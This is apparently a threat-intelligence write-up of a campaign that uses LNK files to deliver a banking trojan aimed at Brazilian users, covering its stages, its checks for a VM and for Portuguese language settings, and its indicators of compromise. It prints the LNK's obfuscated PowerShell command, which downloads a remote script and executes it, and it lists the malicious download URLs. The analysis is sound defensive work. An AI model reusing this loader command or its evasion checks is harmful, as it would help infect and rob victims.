cancel
Showing results for 
Search instead for 
Did you mean: 
New Article

Brazilian Banker delivered by LNK file

Employee
Employee
2 0 71

On the 10th of October, Threat Intelligence analysts encountered a campaign of banking trojan delivered by LNK via email messages. The campaign is targeting Brazilian emails only and employs different methods to ensure the victim is actually from Brazil, including checking the IP location and language settings of the system.

Technical Analysis

In the first stage of the attack, The LNK file runs PowerShell code (see below) in order to download a file with extension JPG from w4z1news\.online/kdg37/kw1\.jpg, which actually contain a second stage PowerShell script. The script also contains a link to www.java.com/download (which could serve as a decoy).

%SystemRoot%\System32\cmd.exe /V /C C:\Windows\System32\Windowsp^OwE^rsH^El^l\v1.0\POw^Er^SH^eL^L.exe -nop -win 1 Get-Member; Get-NetDomain; Write-Warning 'Nosso site usa cookies para garantir a melhor experiência possível'; 
ieX(iEX('(New-{0}ect N{1}bClient)."doWNloAdsTRiNG"("""{2}-eu-west{3}?tk=HeL""")' -f 'Obj', 'et.We','https://s3','-1.amazonaws.com/killino/Gera.png'));Get-NetDomain
!%SystemRoot%\system32\ieframe.dll‍‍‍‍‍‍‍‍‍

The second stage PowerShell script refers to the same domain to download 2 archive files:

  • w4z1news\.online/kdg37/mf3a\.php- contains a malicious DLL which will be executed in the next step.
  • w4z1news\.online/kdg37/mf3a1\.ah6- contains a few files that will be in use in later stages.

The script then queries WMI to verify that this is not a VM as well as that the OS language is Portuguese. If the parameters returned are wrong, the script exits and does not execute the malware.

After the verification, both archived files are extracted and deleted, and the DLLs are executed.


The DLL file is reaching the other file that was extracted (mf3a1.ah6) and then re-loads itself with another PID but keeps the older process running. It performs another location verification, by checking the system language again.

The DLL seems to be a banker, related to other common banking attacks observed against Brazil in the last years.

IOCs:

LNK file: e39820ec1564338962ba47ef323809aa

Second stage PowerShell: w4z1news\.online/kdg37/kw1\.jpg

DLL download: w4z1news\.online/kdg37/mf3a\.php 

Archive downlaoad: w4z1news\.online/kdg37/mf3a1\.ah6

Tags (3)